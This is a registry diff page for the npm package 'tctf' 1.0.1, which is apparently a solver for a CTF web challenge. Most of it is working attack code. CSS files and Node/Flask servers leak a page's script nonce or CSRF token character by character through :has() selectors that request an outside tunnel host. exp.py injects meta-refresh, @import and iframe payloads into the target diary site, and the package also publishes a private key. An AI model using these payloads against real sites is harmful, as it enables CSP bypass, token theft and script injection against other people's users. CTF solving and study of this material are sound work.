npm - tctf - Versions diffs - 1.0.1 - Mend

tctf 1.0.1

Potentially problematic release.

This version of tctf might be problematic. Click here for more details.

Files changed (20) hide show

package/.vscode/launch.json +16 -0
package/1.css +1 -0
package/2.css +1 -0
package/__pycache__/exp.cpython-311.pyc +0 -0
package/cert.pem +31 -0
package/css.js +78 -0
package/css.py +88 -0
package/exp.js +76 -0
package/exp.py +70 -0
package/key.pem +52 -0
package/npm/1.css +72 -0
package/npm/2.css +1 -0
package/npm/__pycache__/npm.cpython-311.pyc +0 -0
package/npm/npm.py +26 -0
package/npm/package.json +7 -0
package/package.json +7 -0
package/templates/exp.html +23 -0
package/test.html +39 -0
package/wsgi.py +4 -0
package//345/210/206/346/236/220 +67 -0

package/.vscode/launch.json ADDED Viewed

@@ -0,0 +1,16 @@
+{
+    // 使用 IntelliSense 了解相关属性。
+    // 悬停以查看现有属性的描述。
+    // 欲了解更多信息，请访问: https://go.microsoft.com/fwlink/?linkid=830387
+    "version": "0.2.0",
+    "configurations": [
+        {
+            "name": "Python: 当前文件",
+            "type": "python",
+            "request": "launch",
+            "program": "${file}",
+            "console": "integratedTerminal",
+            "justMyCode": false
+        }
+    ]
+}

package/1.css ADDED Viewed

@@ -0,0 +1 @@

+ html:has(script[nonce^='a']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=a);}html:has(script[nonce$='a']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=a);}html:has(script[nonce^='b']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=b);}html:has(script[nonce$='b']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=b);}html:has(script[nonce^='c']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=c);}html:has(script[nonce$='c']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=c);}html:has(script[nonce^='d']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=d);}html:has(script[nonce$='d']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=d);}html:has(script[nonce^='e']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=e);}html:has(script[nonce$='e']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=e);}html:has(script[nonce^='f']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=f);}html:has(script[nonce$='f']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=f);}html:has(script[nonce^='g']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=g);}html:has(script[nonce$='g']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=g);}html:has(script[nonce^='h']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=h);}html:has(script[nonce$='h']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=h);}html:has(script[nonce^='i']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=i);}html:has(script[nonce$='i']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=i);}html:has(script[nonce^='j']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=j);}html:has(script[nonce$='j']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=j);}html:has(script[nonce^='k']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=k);}html:has(script[nonce$='k']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=k);}html:has(script[nonce^='l']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=l);}html:has(script[nonce$='l']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=l);}html:has(script[nonce^='m']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=m);}html:has(script[nonce$='m']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=m);}html:has(script[nonce^='n']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=n);}html:has(script[nonce$='n']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=n);}html:has(script[nonce^='o']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=o);}html:has(script[nonce$='o']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=o);}html:has(script[nonce^='p']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=p);}html:has(script[nonce$='p']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=p);}html:has(script[nonce^='q']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=q);}html:has(script[nonce$='q']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=q);}html:has(script[nonce^='r']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=r);}html:has(script[nonce$='r']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=r);}html:has(script[nonce^='s']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=s);}html:has(script[nonce$='s']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=s);}html:has(script[nonce^='t']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=t);}html:has(script[nonce$='t']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=t);}html:has(script[nonce^='u']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=u);}html:has(script[nonce$='u']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=u);}html:has(script[nonce^='v']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=v);}html:has(script[nonce$='v']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=v);}html:has(script[nonce^='w']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=w);}html:has(script[nonce$='w']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=w);}html:has(script[nonce^='x']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=x);}html:has(script[nonce$='x']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=x);}html:has(script[nonce^='y']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=y);}html:has(script[nonce$='y']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=y);}html:has(script[nonce^='z']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=z);}html:has(script[nonce$='z']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=z);}html:has(script[nonce^='0']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=0);}html:has(script[nonce$='0']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=0);}html:has(script[nonce^='1']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=1);}html:has(script[nonce$='1']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=1);}html:has(script[nonce^='2']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=2);}html:has(script[nonce$='2']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=2);}html:has(script[nonce^='3']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=3);}html:has(script[nonce$='3']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=3);}html:has(script[nonce^='4']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=4);}html:has(script[nonce$='4']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=4);}html:has(script[nonce^='5']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=5);}html:has(script[nonce$='5']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=5);}html:has(script[nonce^='6']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=6);}html:has(script[nonce$='6']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=6);}html:has(script[nonce^='7']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=7);}html:has(script[nonce$='7']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=7);}html:has(script[nonce^='8']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=8);}html:has(script[nonce$='8']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=8);}html:has(script[nonce^='9']) {background-image:url(https://127.0.0.1:8000/leak_prefix?q=9);}html:has(script[nonce$='9']) {border-image:url(https://127.0.0.1:8000/leak_suffix?q=9);}

package/2.css ADDED Viewed

	@@ -0,0 +1 @@
1	+ 123

package/__pycache__/exp.cpython-311.pyc ADDED Viewed

Binary file

package/cert.pem ADDED Viewed

@@ -0,0 +1,31 @@
+-----BEGIN CERTIFICATE-----
+MIIFazCCA1OgAwIBAgIUZnlwJC0BnITgpT52TbBMzypSNKswDQYJKoZIhvcNAQEL
+BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
+GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yMzEyMDkyMDAyNDhaFw0yNDEy
+MDgyMDAyNDhaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
+HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggIiMA0GCSqGSIb3DQEB
+AQUAA4ICDwAwggIKAoICAQC3wCNNJbDHEnQ03WNquGQHdL3ZgfCRIYWLymskQ2r5
+BJYvn/TLaDnooidJa/wP0n5tE+AdrSVDbdIZX2Plmu4QbmGMqGzBsBvaL6ASuLWF
+0nautGaQ9VAKcAkvzPZnul3re988Gm45TsBR+bTVEPPio8PK57LbCxT1kujxUunJ
+LBM0mE/5CP11itkhIB06vX8p3qeqkNFESppTRd9abpQRIFgclAfU8Cg5T/czgR0q
+IU99HBPzs9ydkl9Yc2iEAu4NuemeclPrJmwezTNOOlaCK9YuYQ8JcVewzZGVh9l/
+iciUjU7qje3kksxR++o4dBm6d9gnvRtW+ZXQb/euK391BDVNtY/NAIciCwSsjGsa
+S6Nvd5RUNwYnh0TmG7Pp40mFb6DXMiqe8ifY2fXFjTfCEIICat4+NdQ48UDrJ45X
+jYwp5uSXpwqxPwi1Cw0h1rWsClkTQ0COhyapvEXJR7vA9diJtEj5L6ZKr6/nbxXw
+Cpi7sTcSXsRJBE6qq4yuNtF5CMgUewYSoVGvSNXGEkXh3BzuEUu8ilMu2snarEtN
+SOCd4MHXYLRC5yjss7xuvdzCT5xE4Zs9acgKKeo+c+IVFRaF9zQLe4caroxavJVj
+sZJPRqzz1nsyVNl5e5u9YmIIRMjRyiNsX7Frh3465vZbh3E91xctI7NqJPfwy2yR
+OwIDAQABo1MwUTAdBgNVHQ4EFgQUM6OjUJyJKWkbXxiBDGhXIlcqriYwHwYDVR0j
+BBgwFoAUM6OjUJyJKWkbXxiBDGhXIlcqriYwDwYDVR0TAQH/BAUwAwEB/zANBgkq
+hkiG9w0BAQsFAAOCAgEAfn+DT5DA5X3rRy5IAMCczmcD/SA52QoY36qT0GtGdGE3
+3QUByPwVLRJ/I9CvHmcnNLC0EIqDiK/OkL6bhoiCtIPegN6biEy4mhFQDXm0+BLu
+wueiCiviOt30nnb9/ReEmGr8UOhcFnp1uDx3+hIJTC6GrsTthfU9Iyg5NPSb9xJI
+EmKhcRYNAXIbWAP0L6pBHAe0t0uRyc+eszOMlvRrFRv0+HB30hkrWW4SDEC6HfQt
+SqRMxtEHp5ugH0jyyjDP0gJq7OdeFc80KXHHnb0Dre3B22fbniE9gDWyupJECHzL
+BEYSfqqkfr9J5rVKr/2J4t4y9fbyi3Md601k1Ktd1RwHwMiA2S9DgHh3lNkiaXuB
++2OOze3AIIPSMcNRfQbdG0ZN0O5BWcSzZyi/5URrRE0TlaJAGJPpGP8fPnzRz54h
+nKfDfFEmPsEXVVd4TAFuQTiAa6Cv6OhcQHUiZk4U6bVioLWe44n7eLpXxfjlr46G
+L8bdKvWZh4DcyiV7iZUJOS8ZB5IAcQA71UxEmgFFyPXOMKXPnvuSLRbeFc3EmX8L
+ZiNIyK9Jkjn/M47x7ndZEb8HZC6olozVj3M67kKLO3twCxCP2m8BAkKIqSweKDnl
+OqGTIqQ1dzgbw5+cfymUtvKH998sQgtGBkEv1pdQSJaaDcXRx2qlfg3hiOUsYxs=
+-----END CERTIFICATE-----

package/css.js ADDED Viewed

@@ -0,0 +1,78 @@
+const compression = require('compression')
+const express = require('express');
+const cssesc = require('cssesc');
+const spdy = require('spdy');
+const fs = require('fs');
+const app = express();
+app.set('etag', false);
+app.use(compression());
+const SESSIONS = {};
+const POLLING_ORIGIN = `https://localhost:3000`;
+const LEAK_ORIGIN = `https://127.0.0.1:3000`;
+function urlencode(s) {
+    return encodeURIComponent(s).replace(/'/g, '%27');
+}
+function createSession(length = 150) {
+    let resolves = [];
+    let promises = [];
+    for (let i = 0; i < length; ++i) {
+        promises[i] = new Promise(resolve => resolves[i] = resolve);
+    }
+    resolves[0]('');
+    return { promises, resolves };
+}
+const CHARSET = Array.from('1234567890/=+QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm');
+app.get('/polling/:session/:index', async (req, res) => {
+    let { session, index } = req.params;
+    index = parseInt(index);
+    if (index === 0 || !(session in SESSIONS)) {
+        SESSIONS[session] = createSession()
+    }
+    res.set('Content-Type', 'text/css');
+    res.set('Cache-Control', 'no-cache');
+    let knownValue = await SESSIONS[session].promises[index];
+    const ret = CHARSET.map(char => {
+        return `[name='csrftoken'][value^='${cssesc(knownValue+char)}'] ~ button {
+            background: url('${LEAK_ORIGIN}/leak/${session}/${urlencode(knownValue+char)}');
+        }`;
+    }).join('\n');
+    res.send(ret);
+});
+app.get('/leak/:session/:value', (req, res) => {
+    let { session, value } = req.params;
+    console.log(`[${session}] Leaked value: ${value}`);
+    SESSIONS[session].resolves[value.length](value);
+    res.status(204).send();
+});
+app.get('/generate', (req, res) => {
+    const length = req.query.len || 100;
+    const session = Math.random().toString(36).slice(2);
+    res.set('Content-type', 'text/plain');
+    for (let i = 0; i < length; ++i) {
+        res.write(`<style>@import '${POLLING_ORIGIN}/polling/${session}/${i}';</style>\n`);
+    }
+    res.send();
+});
+const options = {
+  cert: fs.readFileSync('localhost-cert.pem'),
+  key: fs.readFileSync('localhost-privkey.pem'),
+}
+const PORT = 3000;
+spdy.createServer(options, app).listen(PORT, () => console.log(`Example app listening on port ${PORT}!`))

package/css.py ADDED Viewed

@@ -0,0 +1,88 @@
+from flask import Flask, request, Response, render_template
+import urllib.parse
+import string
+import threading
+from hypercorn.asyncio import serve
+from hypercorn.config import Config
+import asyncio
+import ssl
+import time
+from npm.npm import npm_upload
+def _exception_handler(lp, context):
+    exception = context.get("exception")
+    if isinstance(exception, ssl.SSLError):
+        pass
+    else:
+        lp.default_exception_handler(context)
+LEAK_LENGTH = 32
+THREAD_NUM = LEAK_LENGTH // 2 + 1
+CHAR_CANDIDATES = string.ascii_lowercase + string.digits
+idx = 0
+prefix = ""
+suffix = ""
+exp_url = "http://qvmrzt.natappfree.cc"
+events = [threading.Event() for i in range(THREAD_NUM)]
+for event in events:
+    event.clear()
+events[0].set()
+app = Flask(__name__)
+def build_payload(index, candidates):
+    global prefix
+    global suffix
+    payload = ""
+    for candidate in candidates:
+        id_prefix_to_try = prefix + candidate
+        id_suffix_to_try = candidate + suffix
+        payload += "html:has(script[nonce^='"+id_prefix_to_try+"']) {background-image:url(" + exp_url + "/leak_prefix?q=" + urllib.parse.quote(candidate) + ");}"
+        payload += "html:has(script[nonce$='"+id_suffix_to_try+"']) {border-image:url(" + exp_url + "/leak_suffix?q=" + urllib.parse.quote(candidate) + ");}"
+    npm_upload(index, payload)
+    return payload
+@app.route("/len")
+def len():
+    global idx
+    len = int(request.args.get('len'))
+    events[len-1].wait()
+    payload = build_payload(len, CHAR_CANDIDATES)
+    return Response(payload, mimetype='text/css')
+@app.route("/leak_prefix")
+def leak_prefix():
+    global prefix
+    global suffix
+    global idx
+    q = request.args.get('q')
+    prefix += q
+    print("[+]prefix: " + prefix)
+    idx += 1
+    if idx <= THREAD_NUM:
+        events[idx].set()
+    return ""
+@app.route("/leak_suffix")
+def leak_suffix():
+    global suffix
+    q = request.args.get('q')
+    suffix = q + suffix
+    print("[+]suffix: " + suffix)
+    return ""
+@app.route('/exp')
+def exp():
+    return render_template('exp.html')
+if __name__ == "__main__":
+    config = Config()
+    # config.certfile = "cert.pem"
+    # config.keyfile = "key.pem"
+    config._bind = ["127.0.0.1:8083"]
+    loop = asyncio.new_event_loop()
+    asyncio.set_event_loop(loop)
+    loop.set_exception_handler(_exception_handler)
+    loop.run_until_complete(serve(app, config))

package/exp.js ADDED Viewed

@@ -0,0 +1,76 @@
+const express = require('express');
+const compression = require('compression');
+const cssesc = require('cssesc');
+const spdy = require('spdy');
+const fs = require('fs');
+const app = express();
+app.set('etag', false);
+app.use(compression());
+const SESSIONS = {};
+const LEAK_ORIGIN = `https://127.0.0.1:3000`;
+function urlencode(s) {
+    return encodeURIComponent(s).replace(/'/g, '%27');
+}
+function createSession(length = 150) {
+    let resolves = [];
+    let promises = [];
+    for (let i = 0; i < length; ++i) {
+        promises[i] = new Promise(resolve => resolves[i] = resolve);
+    }
+    resolves[0]('');
+    return { promises, resolves };
+}
+// const CHARSET = Array.from('1234567890/=+QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm');
+const CHARSET = Array.from('1234567890qwertyuiopasdfghjklzxcvbnm');
+app.get('/polling/:session/:index', async (req, res) => {
+    let { session, index } = req.params;
+    index = parseInt(index);
+    if (index === 0 || !(session in SESSIONS)) {
+        SESSIONS[session] = createSession()
+    }
+    res.set('Content-Type', 'text/css');
+    res.set('Cache-Control', 'no-cache');
+    let knownValue = await SESSIONS[session].promises[index];
+    const ret = CHARSET.map(char => {
+        return `html:has(script[nonce^=${cssesc(knownValue+char)}] {background-image:url(${LEAK_ORIGIN}/leak/${session}/${urlencode(knownValue+char)});}`;
+    }).join('\n')
+    res.send(ret);
+});
+app.get('/leak/:session/:value', (req, res) => {
+    let { session, value } = req.params;
+    console.log(`[${session}] Leaked value: ${value}`);
+    SESSIONS[session].resolves[value.length](value);
+    res.status(204).send();
+});
+app.get('/generate', (req, res) => {
+    const length = req.query.len || 32;
+    const session = Math.random().toString(36).slice(2);
+    res.set('Content-type', 'text/plain');
+    for (let i = 0; i < length; ++i) {
+        res.write(`<style>@import '${LEAK_ORIGIN}/polling/${session}/${i}';</style>\n`);
+    }
+    res.send();
+});
+const options = {
+    cert: fs.readFileSync('server.crt'),
+    key: fs.readFileSync('server.key'),
+  }
+  const PORT = 3000;
+  spdy.createServer(options, app).listen(PORT, () => console.log(`Example app listening on port ${PORT}!`))

package/exp.py ADDED Viewed

@@ -0,0 +1,70 @@
+import requests
+import hashlib
+import re
+import string
+import random
+def generate_random_string(length):
+    letters_and_digits = string.ascii_letters + string.digits
+    return ''.join(random.choice(letters_and_digits) for i in range(length))
+def sha256_hash(text):
+    sha256 = hashlib.sha256()
+    sha256.update(text.encode('utf-8'))
+    return sha256.hexdigest()
+username = generate_random_string(6)
+password = sha256_hash(username)
+# base_url = "http://127.0.0.1"
+base_url = "http://new-diary.ctf.0ops.sjtu.cn"
+login_url = "/login"
+write_url = "/write"
+share_read_url = "/share/read"
+share_diary_id_url = "/share_diary/"
+unpkg_url = "https://unpkg.com"
+# exp_url = "https://127.0.0.1:8000"
+exp_url = "http://qvmrzt.natappfree.cc"
+LEAK_LENGTH = 32
+THREAD_NUM = LEAK_LENGTH // 2 + 1
+session = requests.session()
+def write(title, content):
+    write_data = {
+        "title": title,
+        "content": content
+    }
+    session.post(base_url+write_url, data=write_data)
+def main():
+    print(f"[+] 用户名: {username}")
+    print(f"[+] 密码: {password}")
+    # 登录
+    login_data = {
+        "username": username,
+        "password": password
+    }
+    session.post(base_url+login_url, login_data)
+    # 写入meta
+    write("meta", f'<meta http-equiv="refresh" content="0;url={exp_url}/exp">')
+    session.get(base_url+share_diary_id_url+"0")
+    # 写入css
+    write("style", ''.join([f"<style>@import url({unpkg_url}/tctf@1.0.0/1.css)</style>\n" for len in range(1, THREAD_NUM)]))
+    session.get(base_url+share_diary_id_url+"1")
+    # 打印url
+    url = f'{base_url}{share_read_url}#id=0&username={username}'
+    print(f"[+] url: {url}")
+    # 获取nonce
+    nonce = input("nonce: ")
+    # 插入iframe标签
+    write("iframe", f'<iframe srcdoc="<script nonce=\'{nonce}\'>alert(1)</script>"></iframe>')
+    session.get(base_url+share_diary_id_url+"2")
+    session.close()
+if __name__ == "__main__":
+    main()

package/key.pem ADDED Viewed

@@ -0,0 +1,52 @@
+-----BEGIN PRIVATE KEY-----
+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
+Kd2bIYgCreMQ75IcSgL9mgt2IkfN
+-----END PRIVATE KEY-----

package/npm/1.css ADDED Viewed

@@ -0,0 +1,72 @@
+html:has(script[nonce^='a']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=a)}
+html:has(script[nonce^='b']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=b)}
+html:has(script[nonce^='c']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=c)}
+html:has(script[nonce^='d']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=d)}
+html:has(script[nonce^='e']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=e)}
+html:has(script[nonce^='f']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=f)}
+html:has(script[nonce^='g']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=g)}
+html:has(script[nonce^='h']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=h)}
+html:has(script[nonce^='i']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=i)}
+html:has(script[nonce^='j']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=j)}
+html:has(script[nonce^='k']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=k)}
+html:has(script[nonce^='l']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=l)}
+html:has(script[nonce^='m']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=m)}
+html:has(script[nonce^='n']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=n)}
+html:has(script[nonce^='o']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=o)}
+html:has(script[nonce^='p']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=p)}
+html:has(script[nonce^='q']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=q)}
+html:has(script[nonce^='r']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=r)}
+html:has(script[nonce^='s']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=s)}
+html:has(script[nonce^='t']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=t)}
+html:has(script[nonce^='u']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=u)}
+html:has(script[nonce^='v']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=v)}
+html:has(script[nonce^='w']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=w)}
+html:has(script[nonce^='x']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=x)}
+html:has(script[nonce^='y']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=y)}
+html:has(script[nonce^='z']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=z)}
+html:has(script[nonce^='0']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=0)}
+html:has(script[nonce^='1']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=1)}
+html:has(script[nonce^='2']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=2)}
+html:has(script[nonce^='3']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=3)}
+html:has(script[nonce^='4']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=4)}
+html:has(script[nonce^='5']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=5)}
+html:has(script[nonce^='6']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=6)}
+html:has(script[nonce^='7']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=7)}
+html:has(script[nonce^='8']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=8)}
